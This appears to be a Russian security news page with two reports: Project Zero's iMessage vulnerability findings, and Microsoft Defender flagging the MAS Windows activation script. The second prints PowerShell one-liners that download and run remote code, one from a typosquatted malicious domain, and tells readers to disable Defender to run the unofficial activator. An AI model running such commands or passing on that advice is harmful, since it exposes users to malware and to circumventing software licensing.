Хакер может проникнуть в iPhone, просто отправив текстовое сообщение

Хакер может проникнуть в iPhone, просто отправив текстовое сообщение

Хакер может проникнуть в iPhone, просто отправив текстовое сообщение

Вчера на конференции по безопасности Black Hat, проходящей в Лас-Вегасе, эксперт Google Project Zero Натали Силванович рассказала о проблемах безопасности в клиенте iMessage. В случае успешной эксплуатации этих багов злоумышленник может получить контроль над устройством пользователя.

На данный момент Apple уже устранила пять таких уязвимостей. При этом остались еще несколько багов, которые требуют отдельных патчей.

«Такого рода бреши могут привести к выполнению кода. С их помощью злоумышленник также сможет получить доступ к вашим данным», — заявила Силванович.

Эксперт Google Project Zero стала искать эти уязвимости после нашумевшей истории о проблемах безопасности мессенджера WhatsApp. Напомним, что уязвимость WhatsApp позволяла с помощью звонков установить шпиона на iPhone и Android.

Силванович проверила SMS, MMS, голосовую почту на наличие этих багов — пусто, ничего не удалось найти. После этого специалист предположила, что подобные проблемы могут быть у iMessage.

Она подвергла продукт Apple обратному инжинирингу и сразу нашла несколько уязвимостей, которые мог использовать потенциальный атакующий. Причина наличия брешей может заключаться в том, как устроена iMessage — это довольно сложная платформа, которая включает целый набор функций и возможностей.

Одну из самых интересных проблем Силванович нашла в основополагающей логике приложения — атакующий мог легко извлечь данные из текстовых сообщений пользователя.

Для этого злоумышленнику надо отправить пользователю специальное текстовое сообщение, а сервер iMessage отправит в ответ определенные данные атакуемой жертвы. Среди таких данных будет содержимое текстовых сообщений, а также отправленные и принятые изображения.

Другие баги, обнаруженные исследователем, приводят к выполнению вредоносного кода. Их также можно задействовать с помощью простого текстового сообщения.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru